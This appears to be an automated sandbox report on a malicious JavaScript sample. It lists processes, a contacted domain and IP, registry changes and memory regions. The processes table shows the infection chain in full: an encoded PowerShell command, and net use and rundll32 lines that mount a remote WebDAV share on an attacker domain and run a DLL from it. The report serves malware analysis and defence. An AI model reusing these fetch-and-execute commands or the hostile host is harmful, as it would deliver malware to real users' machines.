Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
1267026769116073766.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqujersa.nnw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i24ggiff.upw.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1267026769116073766.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkA
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
endpointexperiment.com
|
94.159.113.48
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.48
|
endpointexperiment.com
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
22BB05D3000
|
heap
|
page read and write
|
||
|
7FFD346CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
47D28FB000
|
stack
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
238E15B8000
|
heap
|
page read and write
|
||
|
22BB0164000
|
heap
|
page read and write
|
||
|
47D2A7F000
|
stack
|
page read and write
|
||
|
647A879000
|
stack
|
page read and write
|
||
|
47D297E000
|
stack
|
page read and write
|
||
|
22BB013F000
|
heap
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
22BB016E000
|
heap
|
page read and write
|
||
|
214DC19B000
|
trusted library allocation
|
page read and write
|
||
|
214EC041000
|
trusted library allocation
|
page read and write
|
||
|
22BB0D82000
|
heap
|
page read and write
|
||
|
214DA160000
|
heap
|
page read and write
|
||
|
214F42E0000
|
heap
|
page read and write
|
||
|
22BB0156000
|
heap
|
page read and write
|
||
|
238E1578000
|
heap
|
page read and write
|
||
|
238E1590000
|
heap
|
page read and write
|
||
|
214DA1A1000
|
heap
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
214DA121000
|
heap
|
page read and write
|
||
|
22BB0177000
|
heap
|
page read and write
|
||
|
238E1460000
|
heap
|
page read and write
|
||
|
22BB0164000
|
heap
|
page read and write
|
||
|
215C310B000
|
heap
|
page read and write
|
||
|
215C3101000
|
heap
|
page read and write
|
||
|
7FFD347C4000
|
trusted library allocation
|
page read and write
|
||
|
22BB0A8D000
|
heap
|
page read and write
|
||
|
214DC542000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
|
22BB0149000
|
heap
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
|
214F4660000
|
heap
|
page read and write
|
||
|
238E158F000
|
heap
|
page read and write
|
||
|
215C2FF0000
|
heap
|
page read and write
|
||
|
22BAE65C000
|
heap
|
page read and write
|
||
|
22BB08E4000
|
heap
|
page read and write
|
||
|
214F4228000
|
heap
|
page read and write
|
||
|
22BB0135000
|
heap
|
page read and write
|
||
|
22BAE650000
|
heap
|
page read and write
|
||
|
22BB0164000
|
heap
|
page read and write
|
||
|
5378FFF000
|
stack
|
page read and write
|
||
|
22BAE65C000
|
heap
|
page read and write
|
||
|
238E2FC0000
|
heap
|
page read and write
|
||
|
215C2FE0000
|
heap
|
page read and write
|
||
|
214F422E000
|
heap
|
page read and write
|
||
|
22BAE65E000
|
heap
|
page read and write
|
||
|
238E16DB000
|
heap
|
page read and write
|
||
|
53796FB000
|
stack
|
page read and write
|
||
|
214DA158000
|
heap
|
page read and write
|
||
|
214EC050000
|
trusted library allocation
|
page read and write
|
||
|
238E47F3000
|
heap
|
page read and write
|
||
|
22BB0156000
|
heap
|
page read and write
|
||
|
215C310F000
|
heap
|
page read and write
|
||
|
22BB0156000
|
heap
|
page read and write
|
||
|
22BB013B000
|
heap
|
page read and write
|
||
|
22BB013B000
|
heap
|
page read and write
|
||
|
214DBB10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3461D000
|
trusted library allocation
|
page execute and read and write
|
||
|
22BB0137000
|
heap
|
page read and write
|
||
|
22BB0173000
|
heap
|
page read and write
|
||
|
22BB0156000
|
heap
|
page read and write
|
||
|
22BB0161000
|
heap
|
page read and write
|
||
|
215C3010000
|
heap
|
page read and write
|
||
|
647AA7F000
|
stack
|
page read and write
|
||
|
238E1587000
|
heap
|
page read and write
|
||
|
647A273000
|
stack
|
page read and write
|
||
|
22BB0166000
|
heap
|
page read and write
|
||
|
22BB0165000
|
heap
|
page read and write
|
||
|
238E159B000
|
heap
|
page read and write
|
||
|
22BB0147000
|
heap
|
page read and write
|
||
|
7FFD34613000
|
trusted library allocation
|
page execute and read and write
|
||
|
215C30F9000
|
heap
|
page read and write
|
||
|
214DBAA0000
|
heap
|
page read and write
|
||
|
214DA152000
|
heap
|
page read and write
|
||
|
22BB0159000
|
heap
|
page read and write
|
||
|
22BB016E000
|
heap
|
page read and write
|
||
|
22BAE655000
|
heap
|
page read and write
|
||
|
647A779000
|
stack
|
page read and write
|
||
|
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
|
647A8FE000
|
stack
|
page read and write
|
||
|
647A7F8000
|
stack
|
page read and write
|
||
|
215C30D7000
|
heap
|
page read and write
|
||
|
214F42B0000
|
heap
|
page execute and read and write
|
||
|
238E1540000
|
heap
|
page read and write
|
||
|
22BB0164000
|
heap
|
page read and write
|
||
|
214DA110000
|
heap
|
page read and write
|
||
|
214DC041000
|
trusted library allocation
|
page read and write
|
||
|
22BB013D000
|
heap
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
22BB0164000
|
heap
|
page read and write
|
||
|
7FFD34800000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
214DBB9A000
|
heap
|
page read and write
|
||
|
22BB0131000
|
heap
|
page read and write
|
||
|
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
|
215C30D7000
|
heap
|
page read and write
|
||
|
47D29FC000
|
stack
|
page read and write
|
||
|
22BAE65A000
|
heap
|
page read and write
|
||
|
214DA119000
|
heap
|
page read and write
|
||
|
215C3060000
|
remote allocation
|
page read and write
|
||
|
7FFD347C9000
|
trusted library allocation
|
page read and write
|
||
|
22BB0173000
|
heap
|
page read and write
|
||
|
22BB014D000
|
heap
|
page read and write
|
||
|
238E1594000
|
heap
|
page read and write
|
||
|
22BAE290000
|
heap
|
page read and write
|
||
|
647A47E000
|
stack
|
page read and write
|
||
|
238E1670000
|
heap
|
page read and write
|
||
|
7612E7A000
|
stack
|
page read and write
|
||
|
215C3094000
|
heap
|
page read and write
|
||
|
5378CFE000
|
stack
|
page read and write
|
||
|
53790FF000
|
stack
|
page read and write
|
||
|
22BB0156000
|
heap
|
page read and write
|
||
|
238E4D30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
|
22BB0170000
|
heap
|
page read and write
|
||
|
214DC142000
|
trusted library allocation
|
page read and write
|
||
|
7612EFE000
|
stack
|
page read and write
|
||
|
53794FD000
|
stack
|
page read and write
|
||
|
215C30E4000
|
heap
|
page read and write
|
||
|
215C3119000
|
heap
|
page read and write
|
||
|
22BAE310000
|
heap
|
page read and write
|
||
|
238E16D4000
|
heap
|
page read and write
|
||
|
7FFD346F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
22BAE2A0000
|
heap
|
page read and write
|
||
|
7FFD346D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22BB02C1000
|
heap
|
page read and write
|
||
|
215C3119000
|
heap
|
page read and write
|
||
|
214DC05B000
|
trusted library allocation
|
page read and write
|
||
|
214DA15A000
|
heap
|
page read and write
|
||
|
238E47F0000
|
heap
|
page read and write
|
||
|
214DBAD0000
|
trusted library allocation
|
page read and write
|
||
|
214DC145000
|
trusted library allocation
|
page read and write
|
||
|
22BAFCF0000
|
heap
|
page read and write
|
||
|
647A97E000
|
stack
|
page read and write
|
||
|
214DA150000
|
heap
|
page read and write
|
||
|
215C30F9000
|
heap
|
page read and write
|
||
|
238E159E000
|
heap
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
22BB013B000
|
heap
|
page read and write
|
||
|
215C30A7000
|
heap
|
page read and write
|
||
|
7FFD347D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5378DFE000
|
stack
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
215C30DB000
|
heap
|
page read and write
|
||
|
214DC422000
|
trusted library allocation
|
page read and write
|
||
|
22BAE65A000
|
heap
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
215C30A0000
|
heap
|
page read and write
|
||
|
22BB0773000
|
heap
|
page read and write
|
||
|
214F425C000
|
heap
|
page read and write
|
||
|
22BB0179000
|
heap
|
page read and write
|
||
|
22BB0132000
|
heap
|
page read and write
|
||
|
22BAE2F2000
|
heap
|
page read and write
|
||
|
215C310F000
|
heap
|
page read and write
|
||
|
214F43C0000
|
heap
|
page read and write
|
||
|
53792FF000
|
stack
|
page read and write
|
||
|
214F4202000
|
heap
|
page read and write
|
||
|
214DC152000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3462C000
|
trusted library allocation
|
page read and write
|
||
|
22BB0156000
|
heap
|
page read and write
|
||
|
214DC195000
|
trusted library allocation
|
page read and write
|
||
|
22BAE2E9000
|
heap
|
page read and write
|
||
|
214DBB90000
|
heap
|
page read and write
|
||
|
238E15A3000
|
heap
|
page read and write
|
||
|
214DA0D0000
|
heap
|
page read and write
|
||
|
215C310B000
|
heap
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
|
22BB017B000
|
heap
|
page read and write
|
||
|
7DF43E620000
|
trusted library allocation
|
page execute and read and write
|
||
|
215C30CC000
|
heap
|
page read and write
|
||
|
214F4231000
|
heap
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
22BB0143000
|
heap
|
page read and write
|
||
|
7FFD347C1000
|
trusted library allocation
|
page read and write
|
||
|
214F419D000
|
heap
|
page read and write
|
||
|
22BAE2E0000
|
heap
|
page read and write
|
||
|
22BB0164000
|
heap
|
page read and write
|
||
|
22BB0151000
|
heap
|
page read and write
|
||
|
647A37E000
|
stack
|
page read and write
|
||
|
22BB0138000
|
heap
|
page read and write
|
||
|
22BB013B000
|
heap
|
page read and write
|
||
|
214DC156000
|
trusted library allocation
|
page read and write
|
||
|
215C3060000
|
remote allocation
|
page read and write
|
||
|
215C3090000
|
heap
|
page read and write
|
||
|
22BB0145000
|
heap
|
page read and write
|
||
|
53791FE000
|
stack
|
page read and write
|
||
|
214DC574000
|
trusted library allocation
|
page read and write
|
||
|
5378984000
|
stack
|
page read and write
|
||
|
214DC0DB000
|
trusted library allocation
|
page read and write
|
||
|
22BAE363000
|
heap
|
page read and write
|
||
|
7FFD34612000
|
trusted library allocation
|
page read and write
|
||
|
214DA0B0000
|
heap
|
page read and write
|
||
|
47D257B000
|
stack
|
page read and write
|
||
|
22BB0164000
|
heap
|
page read and write
|
||
|
22BB0130000
|
heap
|
page read and write
|
||
|
238E4740000
|
heap
|
page read and write
|
||
|
215C3060000
|
remote allocation
|
page read and write
|
||
|
215C30FF000
|
heap
|
page read and write
|
||
|
53793FE000
|
stack
|
page read and write
|
||
|
214F42C0000
|
heap
|
page read and write
|
||
|
7FFD347F2000
|
trusted library allocation
|
page read and write
|
||
|
214DA170000
|
heap
|
page read and write
|
||
|
215C30CC000
|
heap
|
page read and write
|
||
|
647A2FE000
|
stack
|
page read and write
|
||
|
214DA0A0000
|
heap
|
page read and write
|
||
|
214DC0AE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34614000
|
trusted library allocation
|
page read and write
|
||
|
6479FDE000
|
stack
|
page read and write
|
||
|
22BB0171000
|
heap
|
page read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
22BB0153000
|
heap
|
page read and write
|
||
|
22BB0164000
|
heap
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
238E15B0000
|
heap
|
page read and write
|
||
|
647A57E000
|
stack
|
page read and write
|
||
|
214EC0AD000
|
trusted library allocation
|
page read and write
|
||
|
22BAE65C000
|
heap
|
page read and write
|
||
|
22BB0131000
|
heap
|
page read and write
|
||
|
214F423F000
|
heap
|
page read and write
|
||
|
647A4FC000
|
stack
|
page read and write
|
||
|
47D287E000
|
stack
|
page read and write
|
||
|
47D25FE000
|
stack
|
page read and write
|
||
|
647A3FE000
|
stack
|
page read and write
|
||
|
22BB0156000
|
heap
|
page read and write
|
||
|
22BB0167000
|
heap
|
page read and write
|
||
|
214DC3F8000
|
trusted library allocation
|
page read and write
|
||
|
647A67F000
|
stack
|
page read and write
|
||
|
214DC568000
|
trusted library allocation
|
page read and write
|
||
|
214DA198000
|
heap
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
215C30E4000
|
heap
|
page read and write
|
||
|
214DA480000
|
heap
|
page read and write
|
||
|
214F4260000
|
heap
|
page execute and read and write
|
||
|
214DBB00000
|
heap
|
page readonly
|
||
|
22BB015F000
|
heap
|
page read and write
|
||
|
214DC4E7000
|
trusted library allocation
|
page read and write
|
||
|
22BB0141000
|
heap
|
page read and write
|
||
|
647A6F6000
|
stack
|
page read and write
|
||
|
238E158B000
|
heap
|
page read and write
|
||
|
214F4160000
|
heap
|
page read and write
|
||
|
238E158B000
|
heap
|
page read and write
|
||
|
215C30D3000
|
heap
|
page read and write
|
||
|
647A5FE000
|
stack
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
214DC030000
|
heap
|
page read and write
|
||
|
22BAE65B000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
22BB016E000
|
heap
|
page read and write
|
||
|
214DA485000
|
heap
|
page read and write
|
||
|
22BB05DE000
|
heap
|
page read and write
|
||
|
22BAE334000
|
heap
|
page read and write
|
||
|
214DBB95000
|
heap
|
page read and write
|
||
|
214F419F000
|
heap
|
page read and write
|
||
|
7FFD346C6000
|
trusted library allocation
|
page read and write
|
||
|
7612F7F000
|
stack
|
page read and write
|
||
|
214DA209000
|
heap
|
page read and write
|
||
|
22BAE2C0000
|
heap
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
238E16D0000
|
heap
|
page read and write
|
||
|
22BB0172000
|
heap
|
page read and write
|
||
|
22BB0176000
|
heap
|
page read and write
|
||
|
214DBAF0000
|
trusted library allocation
|
page read and write
|
||
|
238E1570000
|
heap
|
page read and write
|
||
|
214F42B7000
|
heap
|
page execute and read and write
|
||
|
22BB015B000
|
heap
|
page read and write
|
||
|
22BB0164000
|
heap
|
page read and write
|
||
|
214DBB70000
|
heap
|
page execute and read and write
|
||
|
22BB014B000
|
heap
|
page read and write
|
||
|
647AAFC000
|
stack
|
page read and write
|
There are 265 hidden memdumps, click here to show them.